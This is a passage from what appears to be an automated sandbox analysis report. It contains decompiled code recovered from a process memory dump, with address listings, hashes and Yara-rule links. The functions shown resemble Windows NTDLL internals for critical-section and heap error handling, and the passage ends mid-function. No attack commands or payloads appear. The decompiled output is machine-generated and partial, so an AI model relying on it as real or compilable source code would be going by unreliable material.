				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04B57D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04BF138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04B57D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04BEFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4c28724 & 0x00000008) != 0) {
						E04BF52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04C015B5(0x4c28ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                                                    0x04c00eb7
                                                                                                                                    0x04c00eb9
                                                                                                                                    0x04c00ec0
                                                                                                                                    0x04c00ec2
                                                                                                                                    0x04c00ecd
                                                                                                                                    0x04c0105b
                                                                                                                                    0x04c0105b
                                                                                                                                    0x04c01061
                                                                                                                                    0x04c01066
                                                                                                                                    0x04c01066
                                                                                                                                    0x04c0106b
                                                                                                                                    0x04c01073
                                                                                                                                    0x04c01073
                                                                                                                                    0x04c00ed3
                                                                                                                                    0x04c00ed6
                                                                                                                                    0x04c00edc
                                                                                                                                    0x04c00ee0
                                                                                                                                    0x04c00ee7
                                                                                                                                    0x04c00ef0
                                                                                                                                    0x04c00ef5
                                                                                                                                    0x04c00efa
                                                                                                                                    0x04c00efc
                                                                                                                                    0x04c00efd
                                                                                                                                    0x04c00f03
                                                                                                                                    0x04c00f04
                                                                                                                                    0x04c00f06
                                                                                                                                    0x04c00f07
                                                                                                                                    0x04c00f09
                                                                                                                                    0x04c00f0e
                                                                                                                                    0x04c00f14
                                                                                                                                    0x04c00f23
                                                                                                                                    0x04c00f2d
                                                                                                                                    0x04c00f34
                                                                                                                                    0x04c00f34
                                                                                                                                    0x04c00f14
                                                                                                                                    0x04c00f52
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c00f58
                                                                                                                                    0x04c00f73
                                                                                                                                    0x04c00f74
                                                                                                                                    0x04c00f79
                                                                                                                                    0x04c00f7d
                                                                                                                                    0x04c00f80
                                                                                                                                    0x04c00f86
                                                                                                                                    0x04c00fab
                                                                                                                                    0x04c00fb5
                                                                                                                                    0x04c00fc6
                                                                                                                                    0x04c00fd1
                                                                                                                                    0x04c00fe3
                                                                                                                                    0x04c00fd3
                                                                                                                                    0x04c00fdc
                                                                                                                                    0x04c00fdc
                                                                                                                                    0x04c00feb
                                                                                                                                    0x04c01009
                                                                                                                                    0x04c01009
                                                                                                                                    0x04c01015
                                                                                                                                    0x04c01027
                                                                                                                                    0x04c01017
                                                                                                                                    0x04c01020
                                                                                                                                    0x04c01020
                                                                                                                                    0x04c0102f
                                                                                                                                    0x04c0103c
                                                                                                                                    0x04c0103c
                                                                                                                                    0x04c01048
                                                                                                                                    0x04c01050
                                                                                                                                    0x04c01050
                                                                                                                                    0x04c01055
                                                                                                                                    0x00000000
                                                                                                                                    0x04c01055
                                                                                                                                    0x04c00f88
                                                                                                                                    0x04c00f9e
                                                                                                                                    0x04c00fa2
                                                                                                                                    0x04c00fa9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c00fa9
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `
                                                                                                                                    • API String ID: 0-2679148245
                                                                                                                                    • Opcode ID: 40ad819fe918417e500c2b60a25ad8e810bc4cd5588e8ebbd5181ac3bec3ddc0
                                                                                                                                    • Instruction ID: c0a941c943705f97e45a3447ef892be8781cb27ddbe3217b21c03e3521d4483d
                                                                                                                                    • Opcode Fuzzy Hash: 40ad819fe918417e500c2b60a25ad8e810bc4cd5588e8ebbd5181ac3bec3ddc0
                                                                                                                                    • Instruction Fuzzy Hash: 4251BF702043419FE324DF19D884B2BB7E6EBC4308F08896CF98697290DB71F905C761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B6F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                    			E04B6F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04B54120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04B79830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04B79990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04B795D0();
							goto L11;
						} else {
							_t109 = L04B54620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E04B7F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04B795D0();
										L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                                    0x04b6f0d3
                                                                                                                                    0x04b6f0d9
                                                                                                                                    0x04b6f0e0
                                                                                                                                    0x04b6f0e7
                                                                                                                                    0x04b6f0f2
                                                                                                                                    0x04b6f0f4
                                                                                                                                    0x04b6f0f8
                                                                                                                                    0x04b6f100
                                                                                                                                    0x04b6f108
                                                                                                                                    0x04b6f10d
                                                                                                                                    0x04b6f115
                                                                                                                                    0x04b6f116
                                                                                                                                    0x04b6f11f
                                                                                                                                    0x04b6f123
                                                                                                                                    0x04b6f124
                                                                                                                                    0x04b6f12c
                                                                                                                                    0x04b6f130
                                                                                                                                    0x04b6f134
                                                                                                                                    0x04b6f13d
                                                                                                                                    0x04b6f144
                                                                                                                                    0x04b6f14b
                                                                                                                                    0x04b6f152
                                                                                                                                    0x04babab0
                                                                                                                                    0x04babab0
                                                                                                                                    0x04b6f158
                                                                                                                                    0x04b6f158
                                                                                                                                    0x04b6f15a
                                                                                                                                    0x04b6f160
                                                                                                                                    0x04b6f165
                                                                                                                                    0x04b6f166
                                                                                                                                    0x04b6f16f
                                                                                                                                    0x04b6f173
                                                                                                                                    0x04babaa7
                                                                                                                                    0x04babaa7
                                                                                                                                    0x04babaab
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6f179
                                                                                                                                    0x04b6f18d
                                                                                                                                    0x04b6f191
                                                                                                                                    0x04babaa2
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6f197
                                                                                                                                    0x04b6f19b
                                                                                                                                    0x04b6f1a2
                                                                                                                                    0x04b6f1a9
                                                                                                                                    0x04b6f1af
                                                                                                                                    0x04b6f1b2
                                                                                                                                    0x04b6f1b6
                                                                                                                                    0x04b6f1b9
                                                                                                                                    0x04b6f1c4
                                                                                                                                    0x04b6f1d8
                                                                                                                                    0x04b6f1df
                                                                                                                                    0x04b6f1e3
                                                                                                                                    0x04b6f1eb
                                                                                                                                    0x04b6f1ee
                                                                                                                                    0x04b6f1f4
                                                                                                                                    0x04b6f20f
                                                                                                                                    0x04babab7
                                                                                                                                    0x04bababb
                                                                                                                                    0x04babacc
                                                                                                                                    0x04babad1
                                                                                                                                    0x04b6f215
                                                                                                                                    0x04b6f218
                                                                                                                                    0x04b6f226
                                                                                                                                    0x04b6f22b
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6f22b
                                                                                                                                    0x04b6f1f6
                                                                                                                                    0x04b6f1f6
                                                                                                                                    0x04b6f1f9
                                                                                                                                    0x04b6f1fb
                                                                                                                                    0x04b6f1fb
                                                                                                                                    0x04b6f1f4
                                                                                                                                    0x04b6f191
                                                                                                                                    0x04b6f173
                                                                                                                                    0x04b6f152
                                                                                                                                    0x04b6f203

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                    • Instruction ID: 30abc97c4fa65044ff29ddfe5b628d9b165a97872961be77b97b2fe1bc5a9e04
                                                                                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                    • Instruction Fuzzy Hash: D5518D716047109FD320DF29C840A6BBBF9FF48754F00896DF9A6876A0E7B4E954CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B6D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                    			E04B6D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4c2d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04B54120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04B7B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04B798D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04B795D0();
					L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                                    0x04b6d29c
                                                                                                                                    0x04b6d2a6
                                                                                                                                    0x04b6d2b1
                                                                                                                                    0x04b6d2b5
                                                                                                                                    0x04b6d2b6
                                                                                                                                    0x04b6d2bc
                                                                                                                                    0x04b6d2bd
                                                                                                                                    0x04b6d2be
                                                                                                                                    0x04b6d2bf
                                                                                                                                    0x04b6d2c2
                                                                                                                                    0x04b6d2c4
                                                                                                                                    0x04b6d2cc
                                                                                                                                    0x04b6d384
                                                                                                                                    0x04b6d34b
                                                                                                                                    0x04b6d34f
                                                                                                                                    0x04b6d350
                                                                                                                                    0x04b6d351
                                                                                                                                    0x04b6d35c
                                                                                                                                    0x04b6d35c
                                                                                                                                    0x04b6d2d6
                                                                                                                                    0x04b6d2da
                                                                                                                                    0x04b6d2e1
                                                                                                                                    0x04b6d361
                                                                                                                                    0x04b6d369
                                                                                                                                    0x04b6d36d
                                                                                                                                    0x04b6d2e3
                                                                                                                                    0x04b6d2e3
                                                                                                                                    0x04b6d2e3
                                                                                                                                    0x04b6d2e5
                                                                                                                                    0x04b6d2ed
                                                                                                                                    0x04b6d2f5
                                                                                                                                    0x04b6d2fa
                                                                                                                                    0x04b6d302
                                                                                                                                    0x04b6d303
                                                                                                                                    0x04b6d30b
                                                                                                                                    0x04b6d30f
                                                                                                                                    0x04b6d313
                                                                                                                                    0x04b6d318
                                                                                                                                    0x04b6d31c
                                                                                                                                    0x04b6d320
                                                                                                                                    0x04b6d379
                                                                                                                                    0x04b6d37d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04baaffe
                                                                                                                                    0x04bab001
                                                                                                                                    0x04bab011
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6d322
                                                                                                                                    0x04b6d322
                                                                                                                                    0x04b6d330
                                                                                                                                    0x04b6d337
                                                                                                                                    0x04b6d35d
                                                                                                                                    0x04b6d339
                                                                                                                                    0x04b6d33f
                                                                                                                                    0x04b6d38c
                                                                                                                                    0x04b6d38c
                                                                                                                                    0x04b6d33f
                                                                                                                                    0x04b6d349
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6d349

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                    • Opcode ID: 4e063c4650373131942f475b0774f973434cc4efe9528ed5cc908295091796a6
                                                                                                                                    • Instruction ID: 3c685e3104ecb2aabaa9947bfc3daa8b41ab75078f371b2313714fafc21cfc23
                                                                                                                                    • Opcode Fuzzy Hash: 4e063c4650373131942f475b0774f973434cc4efe9528ed5cc908295091796a6
                                                                                                                                    • Instruction Fuzzy Hash: D83172B17083459FD721DF28D980A5BBBECEB85654F00096EF99683210E639ED04DB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BE8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                    			E04BE8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4c10d50);
				E04B8D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04BC5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04B8DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04B8DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04B8D130(_t34, _t39, _t40);
			}





                                                                                                                                    0x04be8df1
                                                                                                                                    0x04be8df1
                                                                                                                                    0x04be8df1
                                                                                                                                    0x04be8df1
                                                                                                                                    0x04be8df1
                                                                                                                                    0x04be8df1
                                                                                                                                    0x04be8df3
                                                                                                                                    0x04be8df8
                                                                                                                                    0x04be8dfd
                                                                                                                                    0x04be8e00
                                                                                                                                    0x04be8e0e
                                                                                                                                    0x04be8e2a
                                                                                                                                    0x04be8e36
                                                                                                                                    0x04be8e38
                                                                                                                                    0x04be8e3c
                                                                                                                                    0x04be8e46
                                                                                                                                    0x04be8e46
                                                                                                                                    0x04be8e36
                                                                                                                                    0x04be8e50
                                                                                                                                    0x04be8e56
                                                                                                                                    0x04be8e59
                                                                                                                                    0x04be8e5c
                                                                                                                                    0x04be8e60
                                                                                                                                    0x04be8e67
                                                                                                                                    0x04be8e6d
                                                                                                                                    0x04be8e73
                                                                                                                                    0x04be8e74
                                                                                                                                    0x04be8eb1
                                                                                                                                    0x04be8ebd

                                                                                                                                    Strings
                                                                                                                                    • Critical error detected %lx, xrefs: 04BE8E21
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Critical error detected %lx
                                                                                                                                    • API String ID: 0-802127002
                                                                                                                                    • Opcode ID: 3d71d3be5b76857e860346cae5829f94b3975b65d2185bab111147e91c47612b
                                                                                                                                    • Instruction ID: 9c43fa957a1ffde82e07691a53dd7cab2368ef9a0d89831c6e512d71359380c6
                                                                                                                                    • Opcode Fuzzy Hash: 3d71d3be5b76857e860346cae5829f94b3975b65d2185bab111147e91c47612b
                                                                                                                                    • Instruction Fuzzy Hash: 34117971D00748EBEF25EFA58505BECBBB4EB44315F20469ED0286B291C3342602CF14
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BCFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04BCFF60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                    • API String ID: 0-1911121157
                                                                                                                                    • Opcode ID: cfbe60b613c813343130a446c23b70438bda7bd6093ee3eeb0940ec45f4f541b
                                                                                                                                    • Instruction ID: 4aecacf5696c8d1e93d04d55095d151fbcf1abd8a04116b1b01b155a8dff5190
                                                                                                                                    • Opcode Fuzzy Hash: cfbe60b613c813343130a446c23b70438bda7bd6093ee3eeb0940ec45f4f541b
                                                                                                                                    • Instruction Fuzzy Hash: EC11A175951144EFEB26EF50C988FA877B2FF08718F5580D8E508671A1C779B940DB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C05BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E04C05BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4c11178);
				E04B8D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04C04C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04B7D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04C05542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4c260e8;
								if( *0x4c260e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4c260e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04B79710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
